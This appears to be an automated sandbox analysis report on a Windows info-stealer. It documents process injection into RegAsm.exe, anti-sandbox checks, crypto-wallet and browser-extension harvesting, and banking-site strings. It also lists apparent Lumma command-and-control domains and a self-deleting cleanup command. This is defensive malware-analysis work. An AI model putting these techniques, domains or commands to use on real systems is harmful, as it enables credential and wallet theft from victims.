Source: Yara match	File source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1334300734.00000000041F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1092, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RegAsm.exe	Binary or memory string: DIR_WATCH.DLL
Source: RegAsm.exe, 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
Source: RegAsm.exe	Binary or memory string: SBIEDLL.DLL
Source: RegAsm.exe	Binary or memory string: API_LOG.DLL

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 1510000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 31F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 51F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Memory allocated: 1250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Memory allocated: 2CC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Memory allocated: 2BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Memory allocated: 3100000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Memory allocated: 32E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Memory allocated: 52E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\CFHIIEHJKK.exe	Memory allocated: 15B0000 memory reserve \| memory write watch
Source: C:\ProgramData\CFHIIEHJKK.exe	Memory allocated: 30A0000 memory reserve \| memory write watch
Source: C:\ProgramData\CFHIIEHJKK.exe	Memory allocated: 2DE0000 memory reserve \| memory write watch

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

6_2_0040180D

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\CFHIIEHJKK.exe	Thread delayed: delay time: 922337203685477

Source: C:\ProgramData\CFHIIEHJKK.exe	Window / User API: threadDelayed 6750
Source: C:\ProgramData\CFHIIEHJKK.exe	Window / User API: threadDelayed 3195

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Dropped PE file which has not been started: C:\Program Files\RDP Wrapper\rdpwrap.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Dropped PE file which has not been started: C:\Windows\System32\rfxvmt.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API coverage: 5.4 %

Source: C:\Users\user\Desktop\file.exe TID: 6552	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe TID: 6200	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4484	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe TID: 3876	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\CFHIIEHJKK.exe TID: 6568	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\ProgramData\CFHIIEHJKK.exe TID: 6400	Thread sleep count: 6750 > 30
Source: C:\ProgramData\CFHIIEHJKK.exe TID: 4668	Thread sleep count: 3195 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 6640	Thread sleep count: 59 > 30

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 6_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh

6_2_00410DDB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	6_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,	6_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	6_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	6_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	6_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	6_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	6_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	6_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	6_2_0040CD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 6_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

6_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 6_2_00410FBA GetSystemInfo,wsprintfA,

6_2_00410FBA

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\CFHIIEHJKK.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: AFCBAE.6.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: AFCBAE.6.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: AFCBAE.6.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: AFCBAE.6.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: net1.exe, 00000030.00000002.2418599361.0000000003188000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Administrators}
Source: AFCBAE.6.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000035C9000.00000004.00000800.00020000.00000000.sdmp, CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000035D7000.00000004.00000800.00020000.00000000.sdmp, net1.exe, 00000030.00000002.2418599361.0000000003188000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: *Hyper-V Administrators
Source: AFCBAE.6.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWq
Source: AFCBAE.6.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: AFCBAE.6.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: AFCBAE.6.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: AFCBAE.6.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: RegAsm.exe, 00000006.00000002.2061826674.000000000117A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2061826674.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2096077278.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013C2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.000000000135A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 00000010.00000002.2095679297.00000000014B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWxjO
Source: RegAsm.exe, 00000006.00000002.2061826674.000000000117A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware1
Source: AFCBAE.6.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: AFCBAE.6.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: AFCBAE.6.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: AFCBAE.6.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: AFCBAE.6.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: AFCBAE.6.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: CFHIIEHJKK.exe, 00000014.00000002.2474386335.000000000132C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: net1.exe, 00000030.00000002.2418599361.0000000003196000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Administrators
Source: AFCBAE.6.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: AFCBAE.6.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: AFCBAE.6.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: AFCBAE.6.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: AFCBAE.6.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: AFCBAE.6.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: RegAsm.exe, 00000006.00000002.2061826674.000000000125F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\q
Source: AFCBAE.6.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: RegAsm.exe, 00000013.00000002.2456368486.000000000135A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: AFCBAE.6.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: AFCBAE.6.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: AFCBAE.6.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: AFCBAE.6.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: AFCBAE.6.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: AFCBAE.6.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: AFCBAE.6.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: AFCBAE.6.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_6-86974
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_6-86958
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_6-88289

Source: C:\Windows\System32\drivers\tsusbhub.sys

System information queried: ModuleInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_004476D0 LdrInitializeThunk,

16_2_004476D0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 6_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

6_2_0041D016

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

6_2_00418950

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_004014AD mov eax, dword ptr fs:[00000030h]	6_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0040148A mov eax, dword ptr fs:[00000030h]	6_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_004014A2 mov eax, dword ptr fs:[00000030h]	6_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00418599 mov eax, dword ptr fs:[00000030h]	6_2_00418599
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0041859A mov eax, dword ptr fs:[00000030h]	6_2_0041859A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 6_2_0040884C CopyFileA,GetProcessHeap,RtlAllocateHeap,StrCmpCA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,DeleteFileA,

6_2_0040884C

Source: C:\ProgramData\CFHIIEHJKK.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_0041D016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0041D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_0041D98C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0042762E SetUnhandledExceptionFilter,	6_2_0042762E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CAFAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_6CAFAC62

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 6936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1092, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_031F213D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

2_2_031F213D

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior

LummaC encrypted strings found

Source: GIEHJDHCBA.exe, 0000000C.00000002.1968024042.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: reinforcenh.shop
Source: GIEHJDHCBA.exe, 0000000C.00000002.1968024042.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stogeneratmns.shop
Source: GIEHJDHCBA.exe, 0000000C.00000002.1968024042.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: fragnantbui.shop
Source: GIEHJDHCBA.exe, 0000000C.00000002.1968024042.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: drawzhotdog.shop
Source: GIEHJDHCBA.exe, 0000000C.00000002.1968024042.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: vozmeatillu.shop
Source: GIEHJDHCBA.exe, 0000000C.00000002.1968024042.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: offensivedzvju.shop
Source: GIEHJDHCBA.exe, 0000000C.00000002.1968024042.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ghostreedmnu.shop
Source: GIEHJDHCBA.exe, 0000000C.00000002.1968024042.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: gutterydhowi.shop
Source: GIEHJDHCBA.exe, 0000000C.00000002.1968024042.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: wallkedsleeoi.shop

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		6_2_004124A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		6_2_0041257F

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F1B008	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44D000	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 460000	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 10F9008	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F6D008	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\GIEHJDHCBA.exe "C:\ProgramData\GIEHJDHCBA.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\BKKFCFBKFC.exe "C:\ProgramData\BKKFCFBKFC.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\CFHIIEHJKK.exe "C:\ProgramData\CFHIIEHJKK.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CGHDAKKJJJKJ" & exit	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
